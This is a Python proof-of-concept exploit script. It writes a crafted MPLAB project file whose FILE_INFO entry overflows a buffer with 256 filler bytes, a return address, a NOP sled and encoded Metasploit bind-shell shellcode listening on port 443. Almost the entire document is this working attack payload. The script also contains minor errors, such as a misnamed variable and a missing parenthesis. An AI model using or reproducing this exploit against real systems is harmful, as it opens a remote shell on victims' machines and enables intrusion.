
#win32_bind -  EXITFUNC=seh LPORT=443 Size=696 Encoder=Alpha2 http://metasploit.com 
shellcodebs=("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x48\x49\x51\x5a\x6a\x45"
"\x58\x30\x42\x31\x50\x41\x42\x6b\x41\x41\x55\x32\x41\x42\x41\x32"
"\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x78\x69\x6b\x4c\x70"
"\x6a\x68\x6b\x42\x6d\x5a\x48\x4c\x39\x69\x6f\x39\x6f\x59\x6f\x43"
"\x50\x4e\x6b\x70\x6c\x51\x34\x57\x54\x4c\x4b\x52\x65\x57\x4c\x6e"
"\x6b\x71\x6c\x47\x75\x50\x78\x63\x31\x6a\x4f\x6c\x4b\x72\x6f\x36"
"\x78\x6c\x4b\x33\x6f\x35\x70\x75\x51\x78\x6b\x42\x69\x4c\x4b\x70"
"\x34\x4c\x4b\x65\x51\x58\x6e\x55\x61\x4b\x70\x4d\x49\x6c\x6c\x4f"
"\x74\x69\x50\x74\x34\x66\x67\x6b\x71\x4b\x7a\x46\x6d\x33\x31\x6b"
"\x72\x7a\x4b\x6c\x34\x65\x6b\x52\x74\x34\x64\x66\x48\x50\x75\x39"
"\x75\x4c\x4b\x73\x6f\x55\x74\x55\x51\x6a\x4b\x43\x56\x4e\x6b\x44"
"\x4c\x70\x4b\x4e\x6b\x33\x6f\x75\x4c\x34\x41\x78\x6b\x66\x63\x34"
"\x6c\x4c\x4b\x6b\x39\x50\x6c\x47\x54\x67\x6c\x53\x51\x39\x53\x50"
"\x31\x6b\x6b\x35\x34\x4e\x6b\x67\x33\x50\x30\x4c\x4b\x43\x70\x44"
"\x4c\x4c\x4b\x50\x70\x75\x4c\x6e\x4d\x4e\x6b\x63\x70\x56\x68\x73"
"\x6e\x41\x78\x4e\x6e\x50\x4e\x56\x6e\x6a\x4c\x62\x70\x79\x6f\x5a"
"\x76\x61\x76\x42\x73\x65\x36\x50\x68\x76\x53\x74\x72\x75\x38\x51"
"\x67\x42\x53\x57\x42\x41\x4f\x73\x64\x69\x6f\x4e\x30\x32\x48\x68"
"\x4b\x4a\x4d\x49\x6c\x35\x6b\x46\x30\x59\x6f\x79\x46\x43\x6f\x4e"
"\x69\x4d\x35\x53\x56\x6b\x31\x38\x6d\x37\x78\x35\x52\x33\x65\x50"
"\x6a\x77\x72\x4b\x4f\x6a\x70\x65\x38\x5a\x79\x43\x39\x6c\x35\x4e"
"\x4d\x73\x67\x69\x6f\x7a\x76\x71\x43\x70\x53\x30\x53\x53\x63\x30"
"\x53\x51\x53\x72\x73\x37\x33\x30\x53\x6b\x4f\x7a\x70\x70\x66\x50"
"\x68\x73\x31\x6f\x4b\x55\x36\x61\x43\x6f\x79\x6b\x51\x6c\x55\x52"
"\x48\x4d\x74\x77\x6a\x64\x30\x38\x47\x41\x47\x4b\x4f\x68\x56\x43"
"\x5a\x74\x50\x61\x41\x42\x75\x39\x6f\x6a\x70\x42\x48\x4d\x74\x4c"
"\x6d\x54\x6e\x58\x69\x52\x77\x39\x6f\x68\x56\x41\x43\x30\x55\x69"
"\x6f\x6e\x30\x72\x48\x6d\x35\x70\x49\x4d\x56\x43\x79\x50\x57\x69"
"\x6f\x6e\x36\x72\x70\x63\x64\x73\x64\x70\x55\x6b\x4f\x78\x50\x6f"
"\x63\x30\x68\x6b\x57\x73\x49\x6f\x36\x71\x69\x66\x37\x49\x6f\x39"
"\x46\x52\x75\x59\x6f\x6a\x70\x50\x66\x72\x4a\x62\x44\x43\x56\x35"
"\x38\x41\x73\x52\x4d\x6d\x59\x48\x65\x71\x7a\x30\x50\x43\x69\x66"
"\x49\x48\x4c\x4b\x39\x6d\x37\x33\x5a\x41\x54\x6f\x79\x7a\x42\x70"
"\x31\x4f\x30\x6c\x33\x6e\x4a\x4b\x4e\x37\x32\x74\x6d\x4b\x4e\x50"
"\x42\x56\x4c\x6f\x63\x6c\x4d\x72\x5a\x57\x48\x4e\x4b\x4c\x6b\x6e"
"\x4b\x63\x58\x72\x52\x69\x6e\x4d\x63\x36\x76\x4b\x4f\x30\x75\x31"
"\x54\x4b\x4f\x79\x46\x51\x4b\x71\x47\x51\x42\x62\x71\x61\x41\x63"
"\x61\x70\x6a\x43\x31\x36\x31\x50\x51\x43\x65\x66\x31\x4b\x4f\x38"
"\x50\x70\x68\x4e\x4d\x4e\x39\x46\x65\x58\x4e\x50\x53\x4b\x4f\x6a"
"\x76\x52\x4a\x69\x6f\x59\x6f\x76\x57\x6b\x4f\x7a\x70\x6e\x6b\x56"
"\x37\x69\x6c\x6b\x33\x4a\x64\x73\x54\x49\x6f\x68\x56\x66\x32\x59"
"\x6f\x4a\x70\x70\x68\x6c\x30\x4c\x4a\x43\x34\x41\x4f\x71\x43\x4b"
"\x4f\x6e\x36\x4b\x4f\x5a\x70\x45")

buffere = "\x41"*256 + "\x65\x82\xA5\x7C" + "\x90"*16 + shellcodebs + "\x43"*(724-(len(shellcode))


try:
    out_file = open("exploit.mcp",'w')
    out_file.write("[HEADER]\n")
    out_file.write("magic_cookie={66E99B07-E706-4689-9E80-9B2582898A13}\n")
    out_file.write("file_version=1.0\n")
    out_file.write("device=PIC18F452\n")
    out_file.write("[PATH_INFO]\n")
    out_file.write("BuildDirPolicy=BuildDirIsProjectDir\n")
    out_file.write("dir_src=\n")
    out_file.write("dir_bin=\n")
    out_file.write("dir_tmp=\n")
    out_file.write("dir_sin=\n")
    out_file.write("dir_inc=\n")
    out_file.write("dir_lib=\n")
    out_file.write("dir_lkr=\n")
    out_file.write("[CAT_FILTERS]\n")
    out_file.write("filter_src=*.asm\n")
    out_file.write("filter_inc=*.h;*.inc\n")
    out_file.write("filter_obj=*.o\n")
    out_file.write("filter_lib=*.lib\n")
    out_file.write("filter_lkr=*.lkr\n")
    out_file.write("[CAT_SUBFOLDERS]\n")
    out_file.write("subfolder_src=\n")
    out_file.write("subfolder_inc=\n")
    out_file.write("subfolder_obj=\n")
    out_file.write("subfolder_lib=\n")
    out_file.write("subfolder_lkr=\n")
    out_file.write("[FILE_SUBFOLDERS]\n")
    out_file.write("file_000=.\n")
    out_file.write("file_001=.\n")
    out_file.write("[GENERATED_FILES]\n")
    out_file.write("file_000=no\n")
    out_file.write("file_001=no\n")
    out_file.write("[OTHER_FILES]\n")
    out_file.write("file_000=no\n")
    out_file.write("file_001=yes\n")
    out_file.write("[FILE_INFO]\n")
    out_file.write("file_000=" + buffere + "\n")
    out_file.write("file_001=anhld\n")
    out_file.write("[SUITE_INFO]\n")
    out_file.write("suite_guid={6B3DAA78-59C1-46DD-B6AA-DBDAE4E06484}\n")
    out_file.write("suite_state=\n")
    out_file.write("[TOOL_SETTINGS]\n")
    out_file.write("TS{DD2213A8-6310-47B1-8376-9430CDFC013F}=\n")
    out_file.write("TS{BFD27FBA-4A02-4C0E-A5E5-B812F3E7707C}=/o" + "\"$(BINDIR_)$(TARGETBASE).cof\"" + "/M" + "\"$(BINDIR_)$(TARGETBASE).map\"" + "/W\n")
    out_file.write("TS{ADE93A55-C7C7-4D4D-A4BA-59305F7D0391}=\n")
    out_file.write("[INSTRUMENTED_TRACE]\n")
    out_file.write("enable=0\n")
    out_file.write("transport=0\n")
    out_file.write("format=0\n")
    out_file.write("CUSTOM_BUILD]\n")
    out_file.write("Pre-Build=\n")
    out_file.write("Pre-BuildEnabled=1\n")
    out_file.write("Post-Build=\n")
    out_file.write("Post-BuildEnabled=1\n")

    #out_file.write(buffere)
    out_file.close()
    raw_input("\nExploit file created!\n")
except:
    print "Error"
 
